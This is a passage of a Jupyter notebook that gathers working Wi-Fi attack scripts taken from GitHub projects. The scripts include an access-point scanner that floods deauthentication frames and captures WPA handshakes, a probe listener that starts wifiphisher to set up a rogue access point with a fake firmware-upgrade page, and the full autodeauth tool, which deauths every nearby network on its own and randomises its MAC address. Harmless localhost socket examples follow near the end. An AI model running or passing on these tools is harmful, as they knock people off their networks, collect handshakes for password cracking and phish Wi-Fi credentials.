"interface = Prompt.ask(\"Select an [bold][cyan]interface[/cyan][/bold]\",choices=addrs,default=addrs[-1])\n",
"\n",
"print(f\"[bright_black]Sniffing in [underline]{interface}[/underline] until CTRL-C[/bright_black]...\")\n",
"\n",
"ap_list = []\n",
"ap_info_list = []\n",
"\n",
"def handlePackets(pkt):\n",
" global ap_list\n",
" global ap_info_list\n",
" if pkt.haslayer(Dot11Beacon):\n",
" if pkt.addr2 not in ap_list: \n",
" ap_list.append(pkt.addr2)\n",
" wifi_name = pkt.info.decode()\n",
" wifi_mac = pkt.addr2\n",
" sec_info = pkt[Dot11Beacon].getlayer(Dot11Beacon).cap\n",
" try:\n",
" netstats = pkt[Dot11Beacon].network_stats()\n",
" channel = netstats['channel']\n",
" enctype = str('/'.join(netstats['crypto'])).replace(\"OPN\",\"[bold][red]OPEN[/red][/bold]\").replace(\"WEP\",\"[bold][yellow]WEP[/yellow][/bold]\")\n",
" except:\n",
" channel = \"unknown\"\n",
" enctype = \"unknown\"\n",
" rssi = pkt.dBm_AntSignal if hasattr(pkt, 'dBm_AntSignal') else \"unknown\"\n",
" ap_info_list.append([wifi_name,wifi_mac,enctype,str(rssi),str(channel)])\n",
" print(f\"[bright_black]+[/bright_black] Found [green]{wifi_name}[/green] ([cyan]{wifi_mac}[/cyan])\")\n",
"\n",
"chthread = True\n",
"stopped = False\n",
"\n",
"def channel_thread(interf):\n",
" global chthread\n",
" global stopped\n",
" while chthread:\n",
" for x in range(1,14):\n",
" os.popen(f\"iwconfig {interf} channel {x}\").read()\n",
" time.sleep(0.3)\n",
" print(f\"\\n[bright_black]Stopped hopping channels on [underline]{interf}[/underline][/bright_black]\")\n",
" stopped = True\n",
"\n",
"total_packets = 0\n",
"\n",
"def deauthenticate_wifi_network(target_mac,channel,interf,attackmode):\n",
" global total_packets\n",
"\n",
" os.popen(f\"iwconfig {interf} channel {channel}\").read()\n",
" pkt = RadioTap() / Dot11(type=0, subtype=12, addr1=\"ff:ff:ff:ff:ff:ff\", addr2=target_mac, addr3=target_mac) / Dot11Deauth()\n",
" if attackmode:\n",
" while True:\n",
" sendp(pkt, iface=interf, verbose=0)\n",
" print(f\"[bright_black]Sent [underline]{total_packets}[/underline] packets to {target_mac}[/bright_black]\",end=\"\\r\")\n",
" total_packets += 1\n",
" else:\n",
" for x in range(100):\n",
" sendp(pkt, iface=interf, verbose=0)\n",
"\n",
"handshake_fragments = 0\n",
"\n",
"def sniffuntil(pkt):\n",
" global handshake_fragments\n",
"\n",
" pktdmp = PcapWriter(\"handshake.pcap\",append=True,sync=True)\n",
" pktdmp.write(pkt)\n",
"\n",
" if EAPOL in pkt:\n",
" handshake_fragments += 1\n",
" print(f\"[bright_black]+[/bright_black] Captured [green][underline]{handshake_fragments}[/underline][/green] EAPOL packets\")\n",
"\n",
" if handshake_fragments >= 10:\n",
" return True\n",
"\n",
"\n",
"def intercept_handshakes(interf):\n",
" sniff(stop_filter=sniffuntil, iface=interf, monitor=True)\n",
"\n",
"\n",
"Thread(target=channel_thread,args=(interface,)).start()\n",
" \n",
"sniff(iface=interface, prn=handlePackets)\n",
"\n",
"print(\"\\n[bright_black]Showing results[/bright_black]...\")\n",
"\n",
"table = Table(box=box.SIMPLE_HEAD)\n",
"\n",
"table.add_column(\"N.\", justify=\"left\", style=\"bright_black\")\n",
"table.add_column(\"SSID\", justify=\"center\", style=\"cyan\")\n",
"table.add_column(\"BSSID\", justify=\"center\", style=\"green\")\n",
"table.add_column(\"ENC\", justify=\"center\", style=\"white\")\n",
"table.add_column(\"RSSI\", justify=\"center\", style=\"magenta\")\n",
"table.add_column(\"CHANNEL\", justify=\"center\", style=\"blue\")\n",
"\n",
"c = 0\n",
"for x in ap_info_list:\n",
" c+=1\n",
" table.add_row(f\"[bold]{c}[/bold]\", x[0], x[1], x[2], x[3], x[4])\n",
"\n",
"console = Console()\n",
"console.print(table)\n",
"\n",
"chthread = False\n",
"while True:\n",
" if stopped:\n",
" break\n",
"\n",
"indx = int(Prompt.ask(\"Insert [bold][bright_black]N.[/bold][/bright_black]\",default=\"1\"))-1\n",
"target = ap_list[indx]\n",
"chan = ap_info_list[indx][-1]\n",
"print(f\"\\n[bright_black]Attacking {target} on channel {chan}[/bright_black]...\")\n",
"\n",
"mode = Prompt.ask(\"Select attack mode\",choices=[\"handshake_steal\",\"deauth_attack\"],default=\"deauth_attack\")\n",
"\n",
"print(\"\")\n",
"Thread(target=deauthenticate_wifi_network,args=(target,chan,interface,mode == \"deauth_attack\",)).start()\n",
"\n",
"if mode == \"handshake_steal\":\n",
" print(f\"[bright_black]Intercepting handshakes[/bright_black]...\")\n",
" intercept_handshakes(interface)"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Example #5 - Custom Wifi Listener\n",
"\n",
"From: https://github.com/EnriqueITE/customWifiListening\n",
"\n",
"Originally intended as a pre-emptive wifi scanner for attack vector facilitating wififisher. The code was unique and straightforward enough for inclusion in this notebook."
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"#!/usr/bin/env python\n",
"# -*- coding: utf-8 -*-?\n",
"import os, time, socket, fcntl, struct\n",
"from subprocess import call\n",
"from platform import system\n",
"import threading, os, time\n",
"from threading import Thread, Lock\n",
"from subprocess import Popen, PIPE\n",
"from signal import SIGINT, signal\n",
"from scapy.all import *\n",
"import os, ConfigParser\n",
"from subprocess import Popen, PIPE\n",
"\n",
"# Author: Enrique Serrano ( @EnriqueITE | hello@enriqueite.com )\n",
"# define variables\n",
"intfparent='wlan1'\n",
"intfmon='mon0'\n",
"channel='' ### Define channel if not want to hop, and will stay in one channel\n",
"first_pass=1\n",
"lock = Lock()\n",
"DN = open(os.devnull, 'w')\n",
"verbose=0\n",
"probes = list() ## list to add station probes\n",
"os.system(\"clear\")\n",
"enum = 0\n",
"\n",
"\n",
"print \"\"\" \n",
"???? ??????? ??????? ?????????? ??????? ??? ??? ?????? ?????????? ?????????????????? \n",
"????? ???????? ???????? ???????????????????? ??? ?????????????????????? ????????????????????\n",
"?????????????? ????????? ?????? ?????? ??? ??????????????????? ??????? ?????? ????????\n",
"?????????????? ???????????????? ?????? ??? ??????????????????? ??????? ?????? ????????\n",
"??? ??? ??????????????? ??????????????????????? ??? ?????? ?????????????? ?????????????? ???\n",
"??? ??? ??????? ??? ???????????? ??????? ??? ?????? ??? ?????????? ?????????????? ???\n",
"\"\"\"\n",
"print \" Devices - WiFi Networks\"\n",
"print \"-------------------\t ------------------------\"\n",
"\n",
"\n",
"def OScheck():\n",
" osversion = system()\n",
"# print \"Operating System: %s\" %osversion\n",
" if osversion != 'Linux':\n",
" print \"This script only works on Linux OS! Exitting!\"\n",
" exit(1)\n",
"\n",
"def InitMon():\n",
"\tif not os.path.isdir(\"/sys/class/net/\" + intfmon):\n",
"\t\tif not os.path.isdir(\"/sys/class/net/\" + intfparent):\n",
"\t\t\tprint \"WiFi interface %s does not exist! Cannot continue!\" %(intfparent)\n",
"\t\t\texit(1)\n",
"\t\telse:\n",
"\t\t\ttry:\n",
"\t\t\t\t# create monitor interface using iw\n",
"\t\t\t\tos.system(\"iw dev %s interface add %s type monitor\" % (intfparent, intfmon))\n",
"\t\t\t\ttime.sleep(0.5)\n",
"\t\t\t\tos.system(\"ifconfig %s up\" %intfmon)\n",
" \t\t\t\t#print \"Creating monitor VAP %s for parent %s...\" %(intfmon,intfparent)\n",
"\t\t\texcept OSError as e:\n",
"\t\t\t\tprint \"Could not create monitor %s\" %intfmon\n",
"\t\t\t\tos.kill(os.getpid(),SIGINT)\n",
"\t\t\t\tsys.exit(1)\n",
" \telse:\n",
" \t\tif verbose: print \"Monitor %s exists! Nothing to do, just continuing...\" %(intfmon)\n",
"\n",
"def GetMAC(iface):\n",
" s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n",
" info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', iface[:15]))\n",
" macaddr = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]\n",
" return macaddr\n",
"\n",
"def PacketHandler(pkt) :\n",
"\tglobal enum\n",
"\tif pkt.haslayer(Dot11):\n",
"\t\tif pkt.type == 0 and pkt.subtype == 4: ## probe request\n",
"\t\t\tif pkt.info != '': ## broadcast probe request\n",
"\t\t\t\tif not pkt.info in probes:\n",
"\t\t\t\t\tprobes.append(pkt.info)\n",
"\t\t\t\t\tprint \"XX:XX:XX%s \t\t%s.) %s\" %(pkt.addr2.upper()[8:], enum, pkt.info)\n",
"\t\t\t\t\tenum += 1\t\n",
"def calc_freq(channel):\n",
" if channel == 14:\n",
" freq = 2484\n",
" else:\n",
" freq = 2407 + (channel * 5)\n",
" return str(freq)\n",
"\n",
"def channel_hop(channel=None):\n",
"\tglobal intfmon, first_pass\n",
"\tchannelNum=0\n",
"\terr = None\n",
"\twhile 1:\n",
"\t\tif channel:\n",
"\t\t\twith lock: monchannel = channel\n",
"\t\telse:\n",
"\t\t\tchannelNum +=1\n",
"\t\t\tif channelNum > 14: channelNum = 1\n",
"\t\t\twith lock: first_pass = 0\n",
"\t\t\twith lock: monchannel = str(channelNum)\n",
"\t\ttry:\n",
"\t\t\tproc = Popen(['iw', 'dev', intfmon, 'set', 'channel', monchannel], stdout=DN, stderr=PIPE)\n",
"\t\t\tif verbose: print \"Setting %s interface to channel: %s (%s MHz)\" %(intfmon, monchannel, calc_freq(int(monchannel)))\n",
"\t\texcept OSError:\n",
"\t\t\tprint 'Could not execute iw!'\n",
"\t\t\tos.kill(os.getpid(),SIGINT)\n",
"\t\t\tsys.exit(1)\n",
"\t\tfor line in proc.communicate()[1].split('\\n'):\n",
"\t\t\tif len(line) > 2: # iw dev shouldnt display output unless there's an error\n",
"\t\t\t\terr = 'Channel hopping failed: '+ line\n",
"\t\t\tif channel:\n",
"\t\t\t\ttime.sleep(.05)\n",
"\t\t\telse:\n",
"\t\t\t\tif first_pass == 1:\n",
"\t\t\t\t\ttime.sleep(1.5)\n",
"\t\tcontinue\n",
"\n",
"# Check if OS is linux:\n",
"OScheck()\n",
"\n",
"# Check for root privileges\n",
"if os.geteuid() != 0:\n",
"\texit(\"You need to be root to run this script!\")\n",
"# else:\n",
"# \tprint \"You are running this script as root!\"\n",
"\n",
"# Check if monitor device exists\n",
"InitMon()\n",
"\n",
"# Get intfmon actual MAC address\n",
"#macaddr=GetMAC(intfmon).upper()\n",
"#print \"Actual %s MAC Address: %s\" %(intfmon, macaddr)\n",
"\n",
"# Start channel hopping\n",
"hop = Thread(target=channel_hop, args=channel)\n",
"hop.daemon = True\n",
"hop.start()\n",
"\n",
"# Start sniffing with timeout\n",
"sniff(iface=intfmon, prn = PacketHandler, timeout=20)\n",
"if probes:\n",
"\taux = 1\n",
"\tprint \"\\nSelect a network to continue: \\n\"\n",
"\tfor i,j in enumerate(probes):\n",
"\t\tprint str(i) + \".) \" + j\n",
"\twhile aux:\n",
"\t\tnetwork = raw_input(\"\\n-> \")\n",
"\t\tif len(probes) > int(network):\n",
"\t\t\taux = 0\n",
"\t\t\tssid = probes[int(network)]\n",
"\t\t\tprint \"\\nOk! Creating Rogue Ap...\\n\"\n",
"\t\t\twifiphisherCmd = 'wifiphisher -nJ -e \"%s\" -T firmware-upgrade' %(ssid)\n",
"\t\t\tos.system(wifiphisherCmd)\n",
"\t\telse:\n",
"\t\t\tprint \"\\nWifi network doesn't exists, please select one included in the list.\"\n",
"else:\n",
"\tprint \"Wifi probes not found, please try later...\""
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Example #6 - autodeauth\n",
"\n",
"From: https://github.com/Drew-Alleman/autodeauth\n",
"\n",
"As is par for course, this snippet is the bulk of the autodeauth script. It was written with the intention of being used with a raspberry pi, and uses scapy to perform deauth attacks. Drew's style of coding is something I have nevery seen before in python scripts, and is on a level of it's own. His style is very expressionative and descriptive. While the heavily detailed and finely structured object oriented method of programming is very robust and explanitive, it is difficult to read."
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"#!/usr/bin/python3\n",
"\n",
"from multiprocessing import connection\n",
"import os\n",
"\n",
"if os.geteuid() != 0:\n",
" exit(\n",
" \"You need to have root privileges to run this script.\\nPlease try again, this time using 'sudo'. Exiting.\"\n",
" )\n",
"\n",
"import time, json, logging, sys\n",
"import argparse, subprocess, threading\n",
"\n",
"import wifi # Used to scan for local networks\n",
"\n",
"try:\n",
" import RPi.GPIO as GPIO # Used for GPI pin control\n",
"except (ImportError, RuntimeError):\n",
" pass\n",
"\n",
"from scapy.layers.dot11 import RadioTap, Dot11, Dot11Deauth\n",
"from scapy.sendrecv import sendp\n",
"\n",
"LOG_DIR = \"/var/log/autodeauth/\"\n",
"\n",
"\n",
"\"\"\"Formats a string\n",
"\n",
"Keyword arguments:\n",
"string -- String to format\n",
"\n",
"Return\n",
"Formatted string or None if it could not be parsed\n",
"\"\"\"\n",
"format_string = (\n",
" lambda string: None if r\"\\x00\" in string or len(string) == 0 else string.strip()\n",
")\n",
"\"\"\"\n",
"Creates a directory to store the json file\n",
"\n",
"Keyword arguments:\n",
"ssid -- ssid to create loot directory for\n",
"\n",
"Return\n",
"the filepath for the network\n",
"\"\"\"\n",
"get_loot_file = lambda ssid: f\"{LOG_DIR}/loot/{ssid.replace(' ', '')}.json\"\n",
"\n",
"LOG_DIR = \"/var/log/autodeauth/\"\n",
"\n",
"\n",
"def save_dict_to_json_file(file_path: str, content: dict) -> bool:\n",
" \"\"\"Saves a python dictionary to a json file\n",
"\n",
" Keyword arguments:\n",
" file_path -- File path to save the dictionary\n",
" content -- Dictionary to save\n",
"\n",
" Return\n",
" False if the file was not saved or parsed\n",
" \"\"\"\n",
" try:\n",
" with open(file_path, \"a+\") as json_file:\n",
" json.dump(content, json_file, indent=4)\n",
" return True\n",
" except (TypeError, EnvironmentError):\n",
" return False\n",
"\n",
"\n",
"class InterfaceManager:\n",
" def __eq__(self, intertfaceObject) -> bool:\n",
" try:\n",
" return self.interface == intertfaceObject.interface\n",
" except AttributeError:\n",
" return False\n",
"\n",
" def __bool__(self) -> bool:\n",
" return (\n",
" # /sys/class/net/{self.interface}/operstate <-- is linux only\n",
" os.path.exists(f\"/sys/class/net/{self.interface}/operstate\")\n",
" and self.enabled\n",
" )\n",
"\n",
" def __init__(self, interface: str) -> None:\n",
" self.interface = interface\n",
" self.enabled = True\n",
" self.mode = None\n",
" self.create_logger()\n",
"\n",
" def create_logger(self) -> None:\n",
" \"\"\"\n",
" Creates a logging object\n",
" \"\"\"\n",
" self.logger = logging.getLogger(\"interfaceManager\")\n",
" self.logger.setLevel(logging.DEBUG)\n",
" formatter = logging.Formatter(\"%(asctime)s - %(message)s\", \"%Y-%m-%d %H:%M:%S\")\n",
" stream_handler = logging.StreamHandler(sys.stdout)\n",
" stream_handler.setFormatter(formatter)\n",
" file_handler = logging.FileHandler(f\"{LOG_DIR}/log\")\n",
" file_handler.setFormatter(formatter)\n",
" self.logger.addHandler(stream_handler)\n",
" self.logger.addHandler(file_handler)\n",
"\n",
" def get_local_networks(self) -> list:\n",
" try:\n",
" if self.mode == \"monitor\":\n",
" self.set_mode_managed()\n",
" networks = list(set(wifi.Cell.all(self.interface)))\n",
" if not networks:\n",
" return networks\n",
"\n",
" return [\n",
" network\n",
" for network in networks\n",
" if format_string(network.ssid) is not None\n",
" ]\n",
"\n",
" except wifi.exceptions.InterfaceError:\n",
" self.logger.error(\n",
" f\"Restarting interface: {self.interface} an issue occurred\"\n",
" )\n",
" self.restart_network_adapter()\n",
"\n",
" def did_os_command_succeed(self, command: str) -> bool:\n",
" \"\"\"Runs a command and returns true if it worked\n",
"\n",
" Keyword arguments:\n",
" command -- command to run\n",
"\n",
" Return\n",
" False if the command did not succeded\n",
" \"\"\"\n",
" process: tuple = subprocess.getstatusoutput(command)\n",
" # first item is respsonse code\n",
" if process[0] == 0:\n",
" return True\n",
" return False\n",
"\n",
"\n",
" def deauth_network(\n",
" self,\n",
" bssid_address: str,\n",
" target_mac_address: str = \"ff:ff:ff:ff:ff:ff\",\n",
" packet_count: int = 5000,\n",
" frequency: int = 0,\n",
" verbose: int = 0,\n",
" ) -> bool:\n",
" \"\"\"\n",
" Saves the network object to a json file\n",
"\n",
" Keyword arguments:\n",
" bssid_address -- MAC address of the router to deauth\n",
" target_mac_address -- MAC address of the target device to deauth (default: ff:ff:ff:ff:ff:ff) (ALL)\n",
" packet_count -- Amount of deauth frames to send default: 5000\n",
" frequency -- Time between packets sending\n",
" verbose -- Scapy verbosity\n",
"\n",
" Return\n",
" False if the file could not be saved\n",
" \"\"\"\n",
" if self.mode != \"monitor\" and not self.set_mode_monitor():\n",
" return False\n",
" dot11 = Dot11(\n",
" addr1=target_mac_address, addr2=bssid_address, addr3=bssid_address\n",
" )\n",
" frame = RadioTap() / dot11 / Dot11Deauth()\n",
" sendp(\n",
" frame,\n",
" iface=self.interface,\n",
" count=packet_count,\n",
" inter=frequency,\n",
" verbose=verbose,\n",
" )\n",
" self.set_mode_managed()\n",
" return True\n",
"\n",
" def set_down(self) -> bool:\n",
" \"\"\"Sets the primary adapter down\n",
"\n",
" Return:\n",
" True if the adapter was set down\n",
" \"\"\"\n",
" if not self.did_os_command_succeed(f\"sudo ifconfig {self.interface} down\"):\n",
" self.logger.error(f\"Failed to set {self.interface} down\")\n",
" return False\n",
" time.sleep(2)\n",
" return True\n",
"\n",
" def set_up(self) -> bool:\n",
" \"\"\"Sets the primary adapter up\n",
"\n",
" Return:\n",
" True if the adapter was set up\n",
" \"\"\"\n",
" if not self.did_os_command_succeed(f\"sudo ifconfig {self.interface} up\"):\n",
" self.logger.error(f\"Failed to set {self.interface} up\")\n",
" return False\n",
" time.sleep(2)\n",
" return True\n",
"\n",
" def change_mac_address(self):\n",
" if not self.set_down():\n",
" return False\n",
" if not self.did_os_command_succeed(f\"sudo macchanger -b -r {self.interface}\"):\n",
" self.logger.error(\"Failed to change MAC address\")\n",
" return False\n",
" return self.set_up()\n",
"\n",
" def restart_networking_service(self) -> bool:\n",
" \"\"\"\n",
" Attempts to restart the networking service and the network-manager service\n",
" \"\"\"\n",
" if not self.did_os_command_succeed(\n",
" \"sudo service networking restart\"\n",
" ) and not self.did_os_command_succeed(\"sudo service network-manager restart\"):\n",
" self.logger(\"Failed to restart services: networking, and network-manager\")\n",
" return False\n",
" return True\n",
"\n",
" def set_mode_monitor(self) -> bool:\n",
" \"\"\"\n",
" Sets the network interface into monitor mode\n",
" \"\"\"\n",
" if not self.set_down():\n",
" return False\n",
" if not self.did_os_command_succeed(\n",
" f\"sudo iwconfig {self.interface} mode monitor\"\n",
" ):\n",
" self.logger.error(f\"Failed to set {self.interface} to monitor mode\")\n",
" return False\n",
" if not self.set_up():\n",
" return False\n",
" self.monitor_mode = True\n",
" return True\n",
"\n",
" def set_mode_managed(self) -> bool:\n",
" \"\"\"\n",
" Sets the network interface into managed mode\n",
" \"\"\"\n",
" if not self.set_down():\n",
" return False\n",
" if not self.did_os_command_succeed(\n",
" f\"sudo iwconfig {self.interface} mode managed\"\n",
" ):\n",
" self.logger.error(f\"Failed to set {self.interface} to managed\")\n",
" return False\n",
" if self.set_up():\n",
" return False\n",
" self.monitor_mode = False\n",
" return True\n",
"\n",
" def restart_network_adapter(self) -> bool:\n",
" \"\"\"\n",
" Restart the primary network adapter\n",
" \"\"\"\n",
" return self.set_down() and self.set_up()\n",
"\n",
" def stop(self) -> None:\n",
" if self.mode != \"managed\":\n",
" self.set_mode_managed()\n",
" self.enabled = False\n",
"\n",
"\n",
"class AutoDeauth:\n",
" def __init__(self, **kwargs) -> None:\n",
" \"\"\"AutoDeauth\n",
"\n",
" Keyword arguments:\n",
" network_interface -- Interface to run the attack (must support packet injection)\n",
" ssid_blacklist -- Networks to avoid\n",
" ssid_whitelist -- Targets to only attack\n",
" led -- Enable LED Indicators (default: False)\n",
"\n",
" Return\n",
" False if the file was not saved\n",
" \"\"\"\n",
" self.interface = kwargs.get(\"interface\")\n",
" self.interface = InterfaceManager(self.interface)\n",
" self.ssid_blacklist = kwargs.get(\"blacklist\")\n",
" self.ssid_whitelist = kwargs.get(\"whitelist\")\n",
" self.deauth_led = kwargs.get(\"led\")\n",
" self.time = kwargs.get(\"time\")\n",
" self.count = kwargs.get(\"count\")\n",
" self.random = kwargs.get(\"random\")\n",
" self.ignore = kwargs.get(\"ignore\")\n",
" self.verbose = kwargs.get(\"verbose\")\n",
" self.monitor_mode = False\n",
" self.create_logger()\n",
" if self.deauth_led:\n",
" self.init_gpio_pins()\n",
" self.blink_thread = None\n",
" self.is_done = True\n",
"\n",
" def init_gpio_pins(self) -> None:\n",
" \"\"\"\n",
" Sets up the selected GPIO pin\n",
" \"\"\"\n",
" GPIO.setup(self.deauth_led, GPIO.OUT)\n",
"\n",
" def blink_led(self) -> None:\n",
" \"\"\"\n",
" Thread that blinks the led when deauthing a network\n",
" \"\"\"\n",
" while not self.is_done:\n",
" GPIO.output(self.deauth_led, GPIO.HIGH)\n",
" time.sleep(0.2)\n",
" GPIO.output(self.deauth_led, GPIO.LOW)\n",
" time.sleep(0.2)\n",
" GPIO.output(self.deauth_led, GPIO.LOW)\n",
"\n",
" def create_logger(self) -> None:\n",
" \"\"\"\n",
" Creates a logging object\n",
" \"\"\"\n",
" self.logger = logging.getLogger(\"autodeauth\")\n",
" self.logger.setLevel(logging.DEBUG)\n",
" formatter = logging.Formatter(\"%(asctime)s - %(message)s\", \"%Y-%m-%d %H:%M:%S\")\n",
" stream_handler = logging.StreamHandler(sys.stdout)\n",
" stream_handler.setFormatter(formatter)\n",
" file_handler = logging.FileHandler(f\"{LOG_DIR}/log\")\n",
" file_handler.setFormatter(formatter)\n",
" self.logger.addHandler(stream_handler)\n",
" self.logger.addHandler(file_handler)\n",
"\n",
" def save_information(self, network: wifi.Cell) -> bool:\n",
" \"\"\"\n",
" Saves the network object to a json file\n",
"\n",
" Keyword arguments:\n",
" network -- Network object to save\n",
"\n",
" Return\n",
" False if the file could not be saved\n",
" \"\"\"\n",
" file_path = get_loot_file(network.ssid)\n",
" json_obj = {\n",
" \"ssid\": network.ssid,\n",
" \"mac_address\": network.address,\n",
" \"channel\": network.channel,\n",
" \"network.frequency\": network.frequency,\n",
" \"mode\": network.mode,\n",
" \"bitrates\": network.bitrates,\n",
" \"encryption_type\": network.encryption_type,\n",
" \"encrypted\": network.encrypted,\n",
" \"quality\": network.quality,\n",
" \"signal\": network.signal,\n",
" }\n",
" if save_dict_to_json_file(file_path, json_obj):\n",
" return True\n",
" self.logger.error(f\"Failed to save {network.ssid} to {file_path}\")\n",
"\n",
" def get_filtered_networks(self) -> list:\n",
" try:\n",
" networks = self.interface.get_local_networks()\n",
" filtered_networks = []\n",
" if not networks:\n",
" return []\n",
" for network in networks:\n",
" ssid = format_string(network.ssid)\n",
" if not ssid or self.ssid_blacklist and (network.address in self.ssid_blacklist or ssid in self.ssid_blacklist):\n",
" continue\n",
" elif not self.ssid_whitelist or self.ssid_whitelist and ssid in self.ssid_whitelist or self.ssid_whitelist and network.address in self.ssid_whitelist:\n",
" self.save_information(network)\n",
" filtered_networks.append(network)\n",
" return filtered_networks\n",
" except (KeyboardInterrupt):\n",
" self.stop()\n",
"\n",
" def start(self) -> None:\n",
" if not self.interface:\n",
" self.logger.error(\n",
" f\"Failed to start {self.interface.interface} is not a valid interface!\"\n",
" )\n",
" self.stop()\n",
" while True:\n",
" try:\n",
" networks = self.get_filtered_networks()\n",
" for network in networks:\n",
" self.logger.info(\n",
" f\"Sending {self.count} deauth frames to network: {network.address} -- {network.ssid}\"\n",
" )\n",
"\n",
" if self.deauth_led:\n",
" self.is_done = False\n",
" self.blink_thread = threading.Thread(target=self.blink_led)\n",
" self.blink_thread.start()\n",
"\n",
" if self.random:\n",
" if not self.interface.change_mac_address() and not self.ignore:\n",
" self.logger.error(\"Failed to change MAC address\")\n",
" self.stop()\n",
"\n",
" if not self.interface.deauth_network(\n",
" network.address,\n",
" packet_count=self.count,\n",
" frequency=self.time,\n",
" verbose=self.verbose,\n",
" ):\n",
" self.logger.error(\n",
" f\"Failed to deauth {network.address} -- {network.ssid}\"\n",
" )\n",
" self.is_done = True\n",
" if self.deauth_led and self.is_done and self.blink_thread:\n",
" self.blink_thread.join()\n",
" except OSError as e: \n",
" self.logger.warning(f\"{e} Reducing packet count to {1000}\")\n",
" self.count = 1000\n",
" except (KeyboardInterrupt):\n",
" self.stop()\n",
"\n",
" def stop(self) -> None:\n",
" self.logger.info(\"Exiting/Cleaning up\")\n",
" if self.interface:\n",
" self.interface.stop()\n",
" if self.deauth_led and self.blink_thread:\n",
" self.is_done = True\n",
" self.blink_thread.join()\n",
" if self.deauth_led:\n",
" GPIO.cleanup()\n",
" exit()\n",
"\n",
"\n",
"if __name__ == \"__main__\":\n",
" print(\n",
" \"\"\"\n",
" _ _ ___ _ _ \n",
" /_\\ _ _| |_ ___| \\ ___ __ _ _ _| |_| |_ \n",
" / _ \\ || | _/ _ \\ |) / -_) _` | || | _| ' \\ \n",
" /_/ \\_\\_,_|\\__\\___/___/\\___\\__,_|\\_,_|\\__|_||_|\\n\"\"\"\n",
" )\n",
" parser = argparse.ArgumentParser(description=\"Auto Deauth Tool\")\n",
" parser.add_argument(\n",
" \"--interface\",\n",
" \"-i\",\n",
" help=\"Interface to fetch WiFi networks and send deauth packets (must support packet injection) \",\n",
" required=True,\n",
" )\n",
" parser.add_argument(\n",
" \"--blacklist\",\n",
" \"-b\",\n",
" help=\"List of networks ssids/mac addresses to avoid (Comma seperated)\",\n",
" type=lambda arg: arg.split(\",\"),\n",
" )\n",
" parser.add_argument(\n",
" \"--whitelist\",\n",
" \"-w\",\n",
" help=\"List of networks ssids/mac addresses to target (Comma seperated)\",\n",
" type=lambda arg: arg.split(\",\"),\n",
" )\n",
" parser.add_argument(\"--led\", \"-l\", help=\"Led pin number for led display\", type=int)\n",
" parser.add_argument(\n",
" \"--time\",\n",
" \"-t\",\n",
" help=\"Time (in s) between two deauth packets (default 0)\",\n",
" default=0,\n",
" )\n",
" parser.add_argument(\n",
" \"--random\",\n",
" \"-r\",\n",
" help=\"Randomize your MAC address before deauthing each network\",\n",
" default=False,\n",
" action=\"store_true\",\n",
" )\n",
" parser.add_argument(\n",
" \"--ignore\",\n",
" help=\"Ignore errors encountered when randomizing your MAC address\",\n",
" default=False,\n",
" action=\"store_true\",\n",
" )\n",
" parser.add_argument(\n",
" \"--count\",\n",
" \"-c\",\n",
" help=\"Number of packets to send (default 5000)\",\n",
" type=int,\n",
" default=5000,\n",
" )\n",
" parser.add_argument(\n",
" \"--verbose\",\n",
" \"-v\",\n",
" help=\"Scapy verbosity setting (default: 0)\",\n",
" type=int,\n",
" default=0,\n",
" )\n",
" args = parser.parse_args()\n",
" data = vars(args)\n",
" if args.led:\n",
" try:\n",
" GPIO.setmode(GPIO.BOARD)\n",
" except (NameError, ImportError, RuntimeError):\n",
" # GPIO Mode can only be ran on a raspberry pi\n",
" # File \"/usr/local/lib/python3.10/dist-packages/RPi/GPIO/__init__.py\", line 23, in <module>\n",
" #\n",
" # from RPi._GPIO import *\n",
" # RuntimeError: This module can only be run on a Raspberry Pi!\n",
"\n",
" exit(\n",
" \"Unable to setup LED indicator, it doesnt look like you are running using raspberry pi\"\n",
" )\n",
" a = AutoDeauth(**data)\n",
" try:\n",
" a.start()\n",
" except OSError:\n",
" time.sleep(30)\n",
" a.start()\n"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Setting up client / server ipc connections\n",
"\n",
"Basically, this was solely contrived from using codeium AI, but familiarity with the technology confirms feasibility and validity of the approach.\n",
"\n",
"The concept is to configure the daemon to be an IPC server, and seperately create an IPC client to connect to it, query and recieve data from the daemon."
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### Sever implementation"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"import socket\n",
"\n",
"# Create a server socket\n",
"server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n",
"\n",
"# Bind the server socket to a specific address and port\n",
"server_address = ('localhost', 12345)\n",
"server_socket.bind(server_address)\n",
"\n",
"# Start listening for incoming connections\n",
"server_socket.listen()\n",
"\n",
"# Accept a client connection\n",
"client_socket, client_address = server_socket.accept()\n",
"\n",
"# Receive data from the client\n",
"data = client_socket.recv(1024)\n",
"\n",
"# Process the received data\n",
"\n",
"# Send a response back to the client\n",
"response = 'Hello from the server!'\n",
"client_socket.send(response.encode())\n",
"\n",
"# Close the client and server sockets\n",
"client_socket.close()\n",
"server_socket.close()"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### Client implementation"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"import socket\n",
"\n",
"# Create a client socket\n",
"client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n",
"\n",
"# Connect to the server\n",
"server_address = ('localhost', 12345)\n",
"client_socket.connect(server_address)\n",
"\n",
"# Send data to the server\n",
"data = 'Hello from the client!'\n",
"client_socket.send(data.encode())\n",
"\n",
"# Receive a response from the server\n",
"response = client_socket.recv(1024)\n",
"\n",
"# Process the response\n",
"\n",
"# Close the client socket\n",
"client_socket.close()"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Scapy Examples from popular programs (Circa 2018)\n",
"\n",
"Below are examples of popular scapy functions."
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### 1. Aggr-Inject"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"def __init__(self, recv_mac, trans_mac, dst_mac):\n",
